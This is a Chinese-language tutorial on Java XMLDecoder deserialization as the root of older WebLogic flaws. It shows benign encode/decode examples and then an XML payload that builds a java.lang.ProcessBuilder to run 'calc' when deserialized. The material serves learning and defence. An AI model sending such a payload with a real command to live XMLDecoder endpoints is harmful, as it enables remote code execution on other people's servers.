java反序列化——XMLDecoder反序列化漏洞 _反序列化漏洞

本文首发于“合天智汇”公众号作者：Fortheone
前言最近学习JAVA反序列化学到了weblogic部分，weblogic之前的两个反序列化漏洞不涉及T3协议之类的，只是涉及到了XMLDecoder反序列化导致漏洞，但是网上大部分的文章都只讲到了触发XMLDecoder部分就结束了，并没有讲为什么XMLDecoder会触发反序列化导致命令执行。于是带着好奇的我就跟着调了一下XMLDecoder的反序列化过程。
xml序列化首先了解一下java中的XMLDecoder是什么。XMLDecoder就是jdk中一个用于处理xml数据的类，先看两个例子。
这里引用一下浅蓝表哥的（强推浅蓝表哥的博客https://b1ue.cn/
import java.beans.XMLEncoder;import java.io.IOException;import java.util.ArrayList;import java.util.HashMap;/** * @author 浅蓝 * @email blue@ixsec.org * @since 2019/4/24 12:09 */public class Test {public static void main(String[] args) throws IOException, InterruptedException {HashMap<Object, Object> map = new HashMap<>();map.put("123","aaaa");map.put("321",new ArrayList<>());XMLEncoder xmlEncoder = new XMLEncoder(System.out);xmlEncoder.writeObject(map);xmlEncoder.close();}}

文章插图

这样就把map对象变成了xml数据，再使用XMLDecoder解析一下。

/** * @author 浅蓝 * @email blue@ixsec.org * @since 2019/4/24 12:09 */public class Test {public static void main(String[] args) throws IOException, InterruptedException {String s = "<java version="1.8.0_131" class="java.beans.XMLDecoder">n" +" <object class="java.util.HashMap">n" +"<void method="put">n" +"<string>123</string>n" +"<string>aaaa</string>n" +"</void>n" +"<void method="put">n" +"<string>321</string>n" +"<object class="java.util.ArrayList"/>n" +"</void>n" +" </object>n" +"</java>";StringBufferInputStream stringBufferInputStream = new StringBufferInputStream(s);XMLDecoder xmlDecoder = new XMLDecoder(stringBufferInputStream);Object o = xmlDecoder.readObject();System.out.println(o);}}

文章插图

就可以把之前的xml数据反序列化回map对象，那么如果对xml数据进行修改，使其变成一个执行命令的数据。比如说：

<java version="1.7.0_80" class="java.beans.XMLDecoder"> <object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1"><void index="0"><string>calc</string></void></array><void method="start"></void> </object></java>

然后对其反序列化即可执行命令弹出计算器。